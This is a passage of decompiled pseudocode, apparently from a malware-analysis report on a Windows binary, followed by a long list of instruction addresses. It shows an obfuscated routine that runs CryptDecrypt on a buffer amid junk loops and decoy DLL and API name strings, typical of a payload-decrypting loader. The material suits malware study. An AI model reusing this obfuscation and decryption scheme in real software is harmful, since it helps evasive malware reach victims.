								 *0x8a9ba8 = 0;
								_push(0x8a9adc);
								_push( &_v84);
								E00881594(0x8a9a34, _t2053,  &_v52, 0x8a9bb0,  &_v84, 0x8a9b74);
							} else {
								_t1735 =  *0x8a9b18; // 0x12e
								 *0x8a9ab4 = _t1735 + 4;
							}
							_t1287 =  *0x8a9b28; // 0x3d5d8347
							_v312 = _t1287 + 0x2d;
							asm("fild dword [ebp-0x134]");
							 *0x8a9b40 = E004076E8();
							_t1293 =  *0x8b1254(_v20, 0x6610, _v28, 0,  &_v24); // executed
							if(_t1293 == 0) {
								goto L136;
							} else {
								_push(_t2564);
								_push(0x883593);
								_push( *[fs:eax]);
								 *[fs:eax] = _t2565;
								E0040A0C0( &_v36, _v40);
								_v88 = 0;
								do {
									_v312 = _v44 + 0x61;
									asm("fild dword [ebp-0x134]");
									_v72 = E004076E8();
									E0040A0C0( &_v36, _v40);
									_v88 = _v88 + 1;
								} while (_v88 != 0xd);
								_v68 = 0xda - _v84;
								E0040A0C0( &_v36, _v36);
								_v48 = _v52 - _v60;
								E0040A0C0( &_v36, _v36);
								_v32 = E006C0A40( *_v8);
								_v60 = _v72 + 0x25;
								_v84 = 0;
								do {
									_v68 = _v76 + _v92;
									E0040ACEC(_v40, 1, 1,  &_v36);
									_v84 = _v84 + 1;
								} while (_v84 != 7);
								_v64 = 0;
								while(_v64 < 4) {
									_v64 = _v64 + 1;
									_t1732 =  *0x8a9a44; // 0xdd124098
									 *0x8a9b28 = _t1732;
									_v80 = _v56 + _v52;
								}
								_v88 = 0;
								_t1324 =  *0x8a9a6c; // 0xd2d18e86
								 *0x8a9b1c = _t1324;
								E0040ACEC(_v36, 0, 1,  &_v36);
								if(_v76 - _v80 < _v76) {
									 *0x8a9a78 =  *0x8a9b04 * 0x6c;
								}
								_t1330 =  *0x8a9a74; // 0xfde44ace
								 *0x8a9ab4 = _t1330 - 0xa8;
								if(CryptDecrypt(_v24, 0, 0xffffffff, 0,  *( *_v8 + 4),  &_v32) != 0) {
									if(_v80 + 0x30 >= _v44) {
										__eflags = _v92 + _v72 - _v72;
										if(_v92 + _v72 <= _v72) {
											E0040A0C0( &_v40, _v36);
											E0040A0C0( &_v36, _v40);
											__eflags = 0;
											E0040ACEC(_v36, 0, 1,  &_v36);
											E0040A0C0( &_v40, _v40);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v36, _v36);
										} else {
											E0040ACEC(_v36, 0, 1,  &_v36);
											E0040ACEC(_v36, 0, 1,  &_v40);
											E0040A0C0( &_v40, L"VarCyMulI8");
											E0040A0C0( &_v36, _v36);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v36, _v36);
										}
										E0040ACEC(_v40, 1, 1,  &_v36);
										_t1512 =  *0x8a99d4; // 0x0
										_v124 = _t1512;
										__eflags = _v124;
										if(_v124 != 0) {
											_t1696 = _v124 - 4;
											__eflags = _t1696;
											_v124 =  *_t1696;
										}
										__eflags = _v124 - 0x2e;
										if(_v124 <= 0x2e) {
											E0040A0C0( &_v36, _v36);
											E0040A0C0( &_v40, _v40);
											E0040A0C0( &_v40, _v36);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v36, _v36);
											E0040A0C0( &_v36, _v40);
										} else {
											E0040A0C0( &_v40, _v36);
											E0040ACEC(_v40, 1, 1,  &_v40);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v40, L"KBDBGPH.DLL");
											E0040A0C0( &_v40, _v40);
											E0040A0C0( &_v36, _v36);
										}
										__eflags = 0;
										E0040ACEC(_v36, 0, 1,  &_v36);
									} else {
										_v52 = _v56 + 0xb3;
										_v80 = 0;
										while(_v80 < 5) {
											_v80 = _v80 + 1;
											_v44 = _v76 - 0xbe;
											_v92 = _v88 + 0x67;
											E0040A0C0( &_v40, _v40);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v36, _v36);
											E0040ACEC(_v36, 0, 1,  &_v40);
										}
										E0040ACEC(_v40, 1, 1,  &_v36);
									}
									E0040A0C0( &_v36, _v40);
									E0040ACEC(_v40, 1, 1,  &_v36);
									E0040ACEC(_v40, 1, 1,  &_v40);
									E0040A0C0( &_v36, L"RegGetKeySecurity");
									E0040A0C0( &_v36, L"RtlQuerySecurityObject");
									E006C0A5C( *_v8, _v32);
									_t2617 = 0x38 - _v72 - 0x27;
									if(0x38 - _v72 < 0x27) {
										_v60 = 0;
										_push(_v68);
										_t1658 =  *0x8a9b5c; // 0xfffffd84
										_push(_t1658);
										_t2430 =  *0x8a9ad4; // 0xa40b347
										E008736F0(_v84, _t2053, _v72, _t2430, _t2617);
										E0040A0C0( &_v36, L"spwmp.dll");
										_v72 = _v44 + _v84;
										E0040A0C0( &_v36, L"Microsoft.Windows.Diagnosis.TroubleshootingPack.resources.dll");
										_t1667 =  *0x8a9b4c; // 0x3d5d8266
										if(_t1667 -  *0x8a9a6c < 0x55) {
											_v68 = _v56 - 0x59;
											_v48 = _v88 * _v80;
											 *0x8a9b18 = 0x45 -  *0x8a9ba4;
											_t1675 =  *0x8a9b54; // 0x3d5d8300
											 *0x8a9bb0 = _t1675 + 0x74;
											_v312 = _v92 + 0xae;
											asm("fild dword [ebp-0x134]");
											_v52 = E004076E8();
											_t1680 =  *0x8a9b00; // 0x23fd000
											 *0x8a9b1c = _t1680 + 4;
										}
									}
									_t1545 =  *0x8a9b88; // 0x95740b86
									 *0x8a9ac0 = _t1545 -  *0x8a9b38;
									E0040A0C0( &_v36, _v40);
									_t1549 =  *0x8a9b98; // 0x6c1f3d8e
									 *0x8a9ad8 = _t1549 *  *0x8a9b4c;
									 *0x8a9b78 = 0;
									E0087EB5C();
									 *0x8a9ad4 =  *0x8a9b78 * 0x1c;
									_v13 = 1;
									_v72 = _v80 * 0x6c;
									_t1555 =  *0x8aa288; // 0x8b091b
									_v125 =  *_t1555;
									if(_v125 + 0x9f - 0x1a < 0) {
										_v125 = _v125 - 0x20;
									}
									_t1560 =  *0x8a9ce4; // 0x8b0912
									_v126 =  *_t1560;
									if(_v126 + 0x9f - 0x1a < 0) {
										_v126 = _v126 - 0x20;
									}
									_t1565 =  *0x8aa288; // 0x8b091b
									_v127 =  *_t1565;
									if(_v127 + 0x9f - 0x1a < 0) {
										_v127 = _v127 - 0x20;
									}
									_t1570 =  *0x8a9cf4; // 0x8b0911
									_v128 =  *_t1570;
									if(_v128 + 0x9f - 0x1a < 0) {
										_t583 =  &_v128;
										 *_t583 = _v128 - 0x20;
										_t2627 =  *_t583;
									}
									E0040A3C0(0);
									_push(_v360);
									E0040A3C0(0);
									_push(_v364);
									E0040A3C0(0);
									_push(_v368);
									E0040A3C0(0);
									_push(_v372);
									E0040A3C0(0);
									_push(_v376);
									E0040A3C0(0);
									_push(_v380);
									_push(0x88532c);
									E0040A3C0(0);
									_push(_v384);
									E0040A3C0(0);
									_push(_v388);
									E0040A3C0(0);
									_push(_v392);
									E0040A3C0(0);
									_push(_v396);
									E0040A3C0(0);
									_push(_v400);
									E0040A3C0(0);
									_push(_v404);
									E0040A3C0(0);
									_push(_v408);
									E0040A3C0(0);
									_push(_v412);
									E0040A3C0(0);
									_push(_v416);
									E0040A3C0(0);
									_push(_v420);
									E0040A3C0(0);
									_push(_v424);
									E0040A3C0(0);
									_push(_v428);
									E0040A3C0(0);
									_push(_v432);
									E0040A3C0(0);
									_push(_v436);
									E0040A3C0(0);
									_push(_v440);
									E0040A3C0(0);
									_push(_v444);
									E0040A3C0(0);
									_push(_v448);
									E0040A3C0(0);
									_push(_v452);
									_push(0x88532c);
									E0040A3C0(0);
									_push(_v456);
									E0040A3C0(0);
									_push(_v460);
									E0040A3C0(0);
									_push(_v464);
									E0040A3C0(0);
									_push(_v468);
									E0040A3C0(0);
									_push(_v472);
									E0040A3C0(0);
									_push(_v476);
									E0040A3C0(0);
									_push(_v480);
									_push(0x88532c);
									E0040A3C0(0);
									_push(_v484);
									E0040A3C0(0);
									_push(_v488);
									E0040A3C0(0);
									E0040A494( &_v356, _t2053, 0x25, _t2561, _t2562);
									E0040A9E8( &_v36, _v356, _v492);
									_v52 = 0;
									E00870FD8( &_v68, 0x8a9a54, _t2627);
									_v88 = 0;
									do {
										_v60 = _v48 - 0x82;
										_v88 = _v88 + 1;
									} while (_v88 != 5);
									_t1653 =  *0x8a9a38; // 0x299e4f10
									 *0x8a9ad8 = _t1653;
									E0040A0C0( &_v36, _v40);
								}
								_pop(_t2267);
								 *[fs:eax] = _t2267;
								_push(E0088359D);
								_v88 = 0;
								do {
									if(_v72 + _v80 < _v72 + _v72) {
										_v64 = _v56 * _v80;
										_v44 = _v72 * 0xf7;
										_v60 = _v68 + 0x70;
										E0040A0C0( &_v40, _v36);
										_t1443 =  &_v264;
										_t2302 =  *0x8aa15c; // 0x8b091c
										 *((char*)(_t1443 + 1)) =  *_t2302;
										 *_t1443 = 1;
										E0040A324( &_v268,  &_v264);
										_t1446 =  &_v272;
										_t2305 =  *0x8aa288; // 0x8b091b
										 *((char*)(_t1446 + 1)) =  *_t2305;
										 *_t1446 = 1;
										E0040A34C( &_v268, 2,  &_v272);
										E0040A324( &_v312,  &_v268);
										_t1451 =  &_v272;
										_t2309 =  *0x8a9c3c; // 0x8b0918
										 *((char*)(_t1451 + 1)) =  *_t2309;
										 *_t1451 = 1;
										E0040A34C( &_v312, 3,  &_v272);
										E0040A324( &_v500,  &_v312);
										_t1456 =  &_v272;
										_t2313 =  *0x8aa080; // 0x8b0916
										 *((char*)(_t1456 + 1)) =  *_t2313;
										 *_t1456 = 1;
										E0040A34C( &_v500, 4,  &_v272);
										E0040A324( &_v508,  &_v500);
										_t1461 =  &_v272;
										_t2317 =  *0x8aa0b8; // 0x8b0928
										 *((char*)(_t1461 + 1)) =  *_t2317;
										 *_t1461 = 1;
										E0040A34C( &_v508, 5,  &_v272);
										E0040A324( &_v516,  &_v508);
										_t1466 =  &_v272;
										_t2321 =  *0x8aa15c; // 0x8b091c
										 *((char*)(_t1466 + 1)) =  *_t2321;
										 *_t1466 = 1;
										E0040A34C( &_v516, 6,  &_v272);
										E0040A324( &_v524,  &_v516);
										E0040A34C( &_v524, 7, 0x885618);
										E0040A324( &_v536,  &_v524);
										_t1475 =  &_v272;
										_t2327 =  *0x8aa15c; // 0x8b091c
										 *((char*)(_t1475 + 1)) =  *_t2327;
										 *_t1475 = 1;
										E0040A34C( &_v536, 8,  &_v272);
										E0040A324( &_v548,  &_v536);
										_t1480 =  &_v272;
										_t2331 =  *0x8a9f14; // 0x8b0922
										 *((char*)(_t1480 + 1)) =  *_t2331;
										 *_t1480 = 1;
										E0040A34C( &_v548, 9,  &_v272);
										E0040A324( &_v560,  &_v548);
										_t1485 =  &_v272;
										_t2335 =  *0x8a9f14; // 0x8b0922
										 *((char*)(_t1485 + 1)) =  *_t2335;
										 *_t1485 = 1;
										E0040A34C( &_v560, 0xa,  &_v272);
										E0040AA98( &_v560);
										E0040A0C0( &_v36, _v40);
									}
									E0040A0C0( &_v40, L"MmcAspExt.dll");
									E0040ACEC(_v40, 1, 1,  &_v36);
									E0040A0C0( &_v36, _v36);
									_v88 = _v88 + 1;
								} while (_v88 != 0xb);
								E0040ACEC(_v40, 1, 1,  &_v36);
								if(_v76 - _v68 < 0x7a) {
									E0040A0C0( &_v40, _v40);
									E0040A0C0( &_v36, _v36);
									E0040ACEC(_v36, 0, 1,  &_v36);
									E0040A0C0( &_v36, _v40);
									E0040A0C0( &_v40, L"mswmdm.dll");
									E0040A0C0( &_v40, _v40);
								}
								if(_v76 + 0xb8 >= _v72) {
									_t1356 =  *0x8a99d4; // 0x0
									E0040ACB4(_t1356, L"DevicePairingHandler.dll");
									if(__eflags != 0) {
										E0040A0C0( &_v36, _v36);
										E0040A0C0( &_v40, L"mssitlb.dll");
										E0040A0C0( &_v40, _v36);
										E0040A0C0( &_v36, _v40);
										__eflags = 0;
										E0040ACEC(_v36, 0, 1,  &_v36);
										E0040A0C0( &_v40, _v36);
									} else {
										E0040ACEC(_v36, 0, 1,  &_v36);
										E0040A0C0( &_v36, _v40);
										E0040A0C0( &_v40, _v40);
										E0040A0C0( &_v40, _v36);
										E0040A0C0( &_v36, _v40);
										E0040A0C0( &_v36, _v36);
									}
								} else {
									E0040A0C0( &_v36, _v36);
								}
								E0040A0C0( &_v36, _v40);
								E0040A0C0( &_v36, _v40);
								CryptDestroyKey(_v24);
								_v312 = _v48 + 0x17;
								asm("fild dword [ebp-0x134]");
								_v64 = E004076E8();
								E0040A0C0( &_v36, _v40);
								_t1382 =  *0x8a9a58; // 0x22edbf74
								 *0x8a9b24 = _t1382;
								_v56 = 0;
								_push(_v80);
								_push(_v88);
								_t2284 =  *0x8a9ba0; // 0x9636d2e0
								E0087039C(_v44, _t2053, _t2284, _t2561, _t2562);
								_t2285 =  *0x8a9b10; // 0x0
								if(E0040AEFC(L"igd10umd32.dll", 1, _t2285) != 0x49) {
									_v84 = 0;
									do {
										_v92 = _v44 + 4;
										_v312 = _v52 + 0x7d;
										asm("fild dword [ebp-0x134]");
										_v68 = E004076E8();
										_t1401 =  *0x8a9a78; // 0x46db6e33
										 *0x8a9b14 = _t1401 - 0xf6;
										_t1403 =  *0x8a9bbc; // 0x9636d2f7
										 *0x8a9ba4 = _t1403 + 4;
										 *0x8a9ae8 =  *0x8a9a94 * 0x87;
										_t1406 =  *0x8a9b50; // 0x3ea7bd43
										 *0x8a9b98 = _t1406 +  *0x8a9b90;
										_v84 = _v84 + 1;
									} while (_v84 != 0x10);
								}
								_t1390 = _v36;
								_v132 = _t1390;
								if(_v132 != 0) {
									_t1390 =  *((intOrPtr*)(_v132 - 4));
									_v132 = _t1390;
								}
								if(_v132 > 0xa6) {
									_t1391 =  *0x8a9b54; // 0x3d5d8300
									_t1392 = _t1391 *  *0x8a9bc0;
									 *0x8a9ae4 = _t1392;
									return _t1392;
								}
								return _t1390;
							}
						}
					}
				}
			}


























































































































































































































































































                                                              0x00881940
                                                              0x00881940
                                                              0x00881940
                                                              0x00881941
                                                              0x00881943
                                                              0x00881948
                                                              0x00881948
                                                              0x0088194a
                                                              0x0088194c
                                                              0x0088194c
                                                              0x0088194f
                                                              0x00881950
                                                              0x00881951
                                                              0x00881952
                                                              0x00881955
                                                              0x0088195b
                                                              0x00881962
                                                              0x00881963
                                                              0x00881968
                                                              0x0088196b
                                                              0x0088196e
                                                              0x00881974
                                                              0x00881975
                                                              0x0088197a
                                                              0x0088197d
                                                              0x00881986
                                                              0x00881993
                                                              0x00881998
                                                              0x0088199f
                                                              0x008819d6
                                                              0x008819dd
                                                              0x008819e7
                                                              0x008819e9
                                                              0x008819e9
                                                              0x008819ed
                                                              0x008819f4
                                                              0x008819fe
                                                              0x00881a00
                                                              0x00881a00
                                                              0x00881a04
                                                              0x00881a0b
                                                              0x00881a15
                                                              0x00881a17
                                                              0x00881a17
                                                              0x00881a1b
                                                              0x00881a22
                                                              0x00881a2c
                                                              0x00881a2e
                                                              0x00881a2e
                                                              0x00881a40
                                                              0x00881a45
                                                              0x00881a5e
                                                              0x00881a63
                                                              0x00881a7c
                                                              0x00881a81
                                                              0x00881a9a
                                                              0x00881a9f
                                                              0x00881ab8
                                                              0x00881abd
                                                              0x00881ad6
                                                              0x00881adb
                                                              0x00881af4
                                                              0x00881af9
                                                              0x00881b0d
                                                              0x00881b12
                                                              0x00881b26
                                                              0x00881b2b
                                                              0x00881b3f
                                                              0x00881b44
                                                              0x00881b58
                                                              0x00881b5d
                                                              0x00881b76
                                                              0x00881b7b
                                                              0x00881b94
                                                              0x00881b99
                                                              0x00881bb2
                                                              0x00881bb7
                                                              0x00881bcb
                                                              0x00881bd0
                                                              0x00881be9
                                                              0x00881bee
                                                              0x00881c07
                                                              0x00881c0c
                                                              0x00881c25
                                                              0x00881c2a
                                                              0x00881c43
                                                              0x00881c48
                                                              0x00881c61
                                                              0x00881c66
                                                              0x00881c7f
                                                              0x00881c84
                                                              0x00881c9d
                                                              0x00881ca2
                                                              0x00881cbb
                                                              0x00881cd1
                                                              0x00881cdf
                                                              0x00881ce6
                                                              0x00881cf1
                                                              0x00881cfc
                                                              0x00881d05
                                                              0x00881d12
                                                              0x00881d1d
                                                              0x00881d28
                                                              0x00881d38
                                                              0x00881d3f
                                                              0x00881d49
                                                              0x00881d4b
                                                              0x00881d4b
                                                              0x00881d4f
                                                              0x00881d56
                                                              0x00881d60
                                                              0x00881d62
                                                              0x00881d62
                                                              0x00881d62
                                                              0x00881d62
                                                              0x00881d66
                                                              0x00881d6c
                                                              0x00881d74
                                                              0x00881d77
                                                              0x00881d86
                                                              0x00881d8b
                                                              0x00881d91
                                                              0x00881d99
                                                              0x00881d9c
                                                              0x00881dad
                                                              0x00881dc3
                                                              0x00881dc8
                                                              0x00881ddc
                                                              0x00881de1
                                                              0x00881dfa
                                                              0x00881dff
                                                              0x00881e18
                                                              0x00881e1d
                                                              0x00881e31
                                                              0x00881e36
                                                              0x00881e4f
                                                              0x00881e54
                                                              0x00881e6d
                                                              0x00881e72
                                                              0x00881e78
                                                              0x00881e90
                                                              0x00881e95
                                                              0x00881eae
                                                              0x00881eb3
                                                              0x00881ecc
                                                              0x00881ee2
                                                              0x00881ef0
                                                              0x00881ef0
                                                              0x00881f07
                                                              0x00881f1d
                                                              0x00881f30
                                                              0x00881f44
                                                              0x00881f4a
                                                              0x00881f4c
                                                              0x00884e70
                                                              0x00884e72
                                                              0x00884e75
                                                              0x00884e77
                                                              0x00884e7a
                                                              0x00884e7e
                                                              0x00884e80
                                                              0x00884e87
                                                              0x00884e90
                                                              0x00884e9b
                                                              0x00884ea5
                                                              0x00884eb5
                                                              0x00884eba
                                                              0x00884ec5
                                                              0x00884eca
                                                              0x00884eca
                                                              0x00884ed0
                                                              0x00884ed3
                                                              0x00884ed3
                                                              0x00884edf
                                                              0x00884ee6
                                                              0x00884eeb
                                                              0x00884ef0
                                                              0x00884efa
                                                              0x00884eff
                                                              0x00884f0a
                                                              0x00884f17
                                                              0x00884f1e
                                                              0x00884f21
                                                              0x0088521e
                                                              0x00885220
                                                              0x00885223
                                                              0x00885226
                                                              0x00885236
                                                              0x00885246
                                                              0x00885251
                                                              0x00885261
                                                              0x0088526c
                                                              0x0088527c
                                                              0x0088528c
                                                              0x0088529c
                                                              0x008852ac
                                                              0x008852bc
                                                              0x008852c7
                                                              0x008852d4
                                                              0x008852e1
                                                              0x00881f52
                                                              0x00881f5a
                                                              0x00881f5f
                                                              0x00881f6d
                                                              0x00881f72
                                                              0x00881f75
                                                              0x00881f79
                                                              0x00881f7e
                                                              0x00881f7e
                                                              0x00881f83
                                                              0x00881f83
                                                              0x00881f86
                                                              0x00881f8a
                                                              0x00881f94
                                                              0x00881f9a
                                                              0x00881fa5
                                                              0x00881fae
                                                              0x00881fb7
                                                              0x00881fba
                                                              0x00881fc5
                                                              0x00881fca
                                                              0x00881fcf
                                                              0x00881fcf
                                                              0x00881fd2
                                                              0x00881fd7
                                                              0x00881fdc
                                                              0x00881fdc
                                                              0x00881f61
                                                              0x00881f63
                                                              0x00881f66
                                                              0x00881f66
                                                              0x00881fe1
                                                              0x00881fec
                                                              0x00881ff7
                                                              0x00882002
                                                              0x00882009
                                                              0x0088200c
                                                              0x00882010
                                                              0x00882012
                                                              0x00882017
                                                              0x00882029
                                                              0x0088202e
                                                              0x0088203d
                                                              0x0088211d
                                                              0x00882122
                                                              0x00882122
                                                              0x00882125
                                                              0x00882043
                                                              0x00882056
                                                              0x008820c5
                                                              0x008820cf
                                                              0x008820d4
                                                              0x008820de
                                                              0x008820e3
                                                              0x008820ed
                                                              0x008820fc
                                                              0x00882101
                                                              0x00882109
                                                              0x0088210e
                                                              0x00882116
                                                              0x00882058
                                                              0x00882058
                                                              0x00882063
                                                              0x00882072
                                                              0x00882081
                                                              0x00882091
                                                              0x00882096
                                                              0x008820a0
                                                              0x008820a5
                                                              0x008820ad
                                                              0x008820b3
                                                              0x008820be
                                                              0x008820be
                                                              0x00882056
                                                              0x0088212c
                                                              0x0088212d
                                                              0x00882132
                                                              0x00882135
                                                              0x0088213a
                                                              0x00882141
                                                              0x00882143
                                                              0x0088214c
                                                              0x0088214f
                                                              0x0088214f
                                                              0x00882157
                                                              0x0088215c
                                                              0x00882165
                                                              0x0088216d
                                                              0x00882178
                                                              0x00882181
                                                              0x0088218a
                                                              0x00882192
                                                              0x00882193
                                                              0x00882195
                                                              0x00882197
                                                              0x0088219f
                                                              0x008821a8
                                                              0x00884a5b
                                                              0x00884a5e
                                                              0x00884a61
                                                              0x00884a6c
                                                              0x00884a80
                                                              0x00884a8b
                                                              0x00884a90
                                                              0x00884a93
                                                              0x00884a97
                                                              0x00884a99
                                                              0x00884a9e
                                                              0x00884aa1
                                                              0x00884aa5
                                                              0x00884aa7
                                                              0x00884ab2
                                                              0x00884abb
                                                              0x00884ad1
                                                              0x00884adf
                                                              0x00884ae8
                                                              0x00884af3
                                                              0x00884af8
                                                              0x00884af8
                                                              0x00884afe
                                                              0x00884afe
                                                              0x00884b0a
                                                              0x00884b15
                                                              0x00884b1e
                                                              0x00884b2d
                                                              0x008821ae
                                                              0x008821b0
                                                              0x008821b1
                                                              0x008821b6
                                                              0x008821b9
                                                              0x008821bc
                                                              0x008821c6
                                                              0x008821cb
                                                              0x008822e6
                                                              0x008822e9
                                                              0x008822ef
                                                              0x008822f6
                                                              0x008822fe
                                                              0x00882300
                                                              0x00882302
                                                              0x00882302
                                                              0x00882302
                                                              0x00882302
                                                              0x00882306
                                                              0x0088230d
                                                              0x00882315
                                                              0x00882317
                                                              0x00882319
                                                              0x00882319
                                                              0x00882319
                                                              0x00882319
                                                              0x0088231d
                                                              0x00882324
                                                              0x0088232c
                                                              0x0088232e
                                                              0x00882330
                                                              0x00882330
                                                              0x00882330
                                                              0x00882330
                                                              0x00882334
                                                              0x0088233b
                                                              0x00882343
                                                              0x00882345
                                                              0x00882347
                                                              0x00882347
                                                              0x00882347
                                                              0x00882347
                                                              0x0088234b
                                                              0x00882352
                                                              0x0088235a
                                                              0x0088235c
                                                              0x0088235e
                                                              0x0088235e
                                                              0x0088235e
                                                              0x0088235e
                                                              0x00882362
                                                              0x00882369
                                                              0x00882371
                                                              0x00882373
                                                              0x00882375
                                                              0x00882375
                                                              0x00882375
                                                              0x00882375
                                                              0x00882379
                                                              0x00882380
                                                              0x00882383
                                                              0x00882388
                                                              0x0088238a
                                                              0x0088238c
                                                              0x0088238c
                                                              0x0088238c
                                                              0x0088238c
                                                              0x00882390
                                                              0x00882397
                                                              0x0088239f
                                                              0x008823a1
                                                              0x008823a3
                                                              0x008823a3
                                                              0x008823a3
                                                              0x008823a3
                                                              0x008823a7
                                                              0x008823ae
                                                              0x008823b6
                                                              0x008823b8
                                                              0x008823ba
                                                              0x008823ba
                                                              0x008823ba
                                                              0x008823ba
                                                              0x008823cc
                                                              0x008823d1
                                                              0x008823e5
                                                              0x008823ea
                                                              0x008823fe
                                                              0x00882403
                                                              0x00882417
                                                              0x0088241c
                                                              0x00882430
                                                              0x00882435
                                                              0x00882449
                                                              0x0088244e
                                                              0x00882454
                                                              0x00882467
                                                              0x0088246c
                                                              0x00882480
                                                              0x00882485
                                                              0x00882499
                                                              0x008824af
                                                              0x008824bd
                                                              0x008824c8
                                                              0x008824d3
                                                              0x008824de
                                                              0x008824f4
                                                              0x008824ff
                                                              0x008824ff
                                                              0x008821d1
                                                              0x008821da
                                                              0x008821dc
                                                              0x008821e4
                                                              0x008821ee
                                                              0x008821f9
                                                              0x00882202
                                                              0x0088220b
                                                              0x00882216
                                                              0x00882216
                                                              0x00882220
                                                              0x00882233
                                                              0x00882295
                                                              0x008822a2
                                                              0x008822ad
                                                              0x008822b8
                                                              0x008822c3
                                                              0x008822d6
                                                              0x00882235
                                                              0x00882246
                                                              0x00882251
                                                              0x0088225c
                                                              0x0088226f
                                                              0x0088227a
                                                              0x00882285
                                                              0x00882285
                                                              0x00882233
                                                              0x0088250d
                                                              0x00882545
                                                              0x00882550
                                                              0x0088255d
                                                              0x0088250f
                                                              0x00882515
                                                              0x00882520
                                                              0x0088252b
                                                              0x00882538
                                                              0x00882538
                                                              0x00882568
                                                              0x00882573
                                                              0x0088257e
                                                              0x00882589
                                                              0x00882591
                                                              0x00882598
                                                              0x008825a2
                                                              0x008825a2
                                                              0x008825a5
                                                              0x008825aa
                                                              0x008825ae
                                                              0x008825b2
                                                              0x008825bb
                                                              0x00883c3f
                                                              0x00883c45
                                                              0x00883c50
                                                              0x00883c53
                                                              0x00883c5b
                                                              0x00883c61
                                                              0x00883c6a
                                                              0x00883c73
                                                              0x00883c7a
                                                              0x00883c7d
                                                              0x00883c80
                                                              0x00883c8d
                                                              0x00883c98
                                                              0x00883ca3
                                                              0x00883cac
                                                              0x00883cb5
                                                              0x00883cb8
                                                              0x00883d20
                                                              0x00883cba
                                                              0x00883cc2
                                                              0x00883cc5
                                                              0x00883cd8
                                                              0x00883ce3
                                                              0x00883cee
                                                              0x00883cf9
                                                              0x00883d04
                                                              0x00883d11
                                                              0x00883d11
                                                              0x00883cc5
                                                              0x00883d27
                                                              0x00883d28
                                                              0x00883d2d
                                                              0x00883d30
                                                              0x00883d33
                                                              0x00883d3a
                                                              0x00883d48
                                                              0x00883d4a
                                                              0x00883d4c
                                                              0x00883d4c
                                                              0x00883d4c
                                                              0x00883d4c
                                                              0x00883d53
                                                              0x00883d5a
                                                              0x00883d68
                                                              0x00883d6a
                                                              0x00883d6c
                                                              0x00883d6c
                                                              0x00883d6c
                                                              0x00883d6c
                                                              0x00883d73
                                                              0x00883d7a
                                                              0x00883d88
                                                              0x00883d8a
                                                              0x00883d8c
                                                              0x00883d8c
                                                              0x00883d8c
                                                              0x00883d8c
                                                              0x00883d93
                                                              0x00883d9a
                                                              0x00883da8
                                                              0x00883daa
                                                              0x00883dac
                                                              0x00883dac
                                                              0x00883dac
                                                              0x00883dac
                                                              0x00883dc4
                                                              0x00883dc9
                                                              0x00883de0
                                                              0x00883de5
                                                              0x00883dfc
                                                              0x00883e01
                                                              0x00883e18
                                                              0x00883e1d
                                                              0x00883e2e
                                                              0x00883e33
                                                              0x00883e41
                                                              0x00883e46
                                                              0x00883e54
                                                              0x00883e59
                                                              0x00883e5f
                                                              0x00883e6f
                                                              0x00883e74
                                                              0x00883e7b
                                                              0x00883e89
                                                              0x00883e8b
                                                              0x00883e8d
                                                              0x00883e8d
                                                              0x00883e8d
                                                              0x00883e8d
                                                              0x00883e94
                                                              0x00883e9b
                                                              0x00883ea9
                                                              0x00883eab
                                                              0x00883ead
                                                              0x00883ead
                                                              0x00883ead
                                                              0x00883ead
                                                              0x00883eb4
                                                              0x00883ebb
                                                              0x00883ec9
                                                              0x00883ecb
                                                              0x00883ecd
                                                              0x00883ecd
                                                              0x00883ecd
                                                              0x00883ecd
                                                              0x00883ed4
                                                              0x00883eeb
                                                              0x00883ef0
                                                              0x00883f07
                                                              0x00883f0c
                                                              0x00883f23
                                                              0x00883f39
                                                              0x00883f47
                                                              0x00883f4c
                                                              0x00883f4e
                                                              0x00883f51
                                                              0x00883f54
                                                              0x00883f64
                                                              0x008825c1
                                                              0x008825c3
                                                              0x008825ca
                                                              0x008825cc
                                                              0x008825d7
                                                              0x008825dd
                                                              0x008825e8
                                                              0x008825eb
                                                              0x008825f1
                                                              0x008825fb
                                                              0x00882608
                                                              0x0088260b
                                                              0x00882615
                                                              0x0088261b
                                                              0x0088262e
                                                              0x00882630
                                                              0x00882633
                                                              0x00882639
                                                              0x0088263c
                                                              0x00882646
                                                              0x0088264b
                                                              0x00882656
                                                              0x0088265b
                                                              0x00882666
                                                              0x0088266b
                                                              0x00882676
                                                              0x00882682
                                                              0x00882687
                                                              0x0088268a
                                                              0x0088268a
                                                              0x0088261d
                                                              0x0088261d
                                                              0x00882627
                                                              0x00882627
                                                              0x00882690
                                                              0x0088269b
                                                              0x008826a1
                                                              0x008826b2
                                                              0x008826b4
                                                              0x008826b9
                                                              0x008826c1
                                                              0x008826d8
                                                              0x008826a3
                                                              0x008826a3
                                                              0x008826ab
                                                              0x008826ab
                                                              0x008826dd
                                                              0x008826e5
                                                              0x008826eb
                                                              0x008826f6
                                                              0x0088270e
                                                              0x00882716
                                                              0x00000000
                                                              0x0088271c
                                                              0x0088271e
                                                              0x0088271f
                                                              0x00882724
                                                              0x00882727
                                                              0x00882730
                                                              0x00882737
                                                              0x0088273a
                                                              0x00882740
                                                              0x00882746
                                                              0x00882751
                                                              0x0088275a
                                                              0x0088275f
                                                              0x00882762
                                                              0x00882770
                                                              0x00882779
                                                              0x00882784
                                                              0x0088278d
                                                              0x0088279c
                                                              0x008827a5
                                                              0x008827aa
                                                              0x008827ad
                                                              0x008827b3
                                                              0x008827c7
                                                              0x008827cc
                                                              0x008827cf
                                                              0x008827d7
                                                              0x008827de
                                                              0x008827e0
                                                              0x008827e3
                                                              0x008827e8
                                                              0x008827f3
                                                              0x008827f6
                                                              0x008827fe
                                                              0x00882801
                                                              0x00882806
                                                              0x00882819
                                                              0x00882832
                                                              0x0088283b
                                                              0x0088283b
                                                              0x00882840
                                                              0x0088284a
                                                              0x0088286e
                                                              0x0088287d
                                                              0x0088290b
                                                              0x0088290e
                                                              0x0088296c
                                                              0x00882977
                                                              0x00882980
                                                              0x0088298a
                                                              0x00882995
                                                              0x008829a0
                                                              0x008829ab
                                                              0x00882910
                                                              0x0088291e
                                                              0x00882931
                                                              0x0088293e
                                                              0x00882949
                                                              0x00882954
                                                              0x0088295f
                                                              0x0088295f
                                                              0x008829c1
                                                              0x008829c6
                                                              0x008829cb
                                                              0x008829ce
                                                              0x008829d2
                                                              0x008829d7
                                                              0x008829d7
                                                              0x008829dc
                                                              0x008829dc
                                                              0x008829df
                                                              0x008829e3
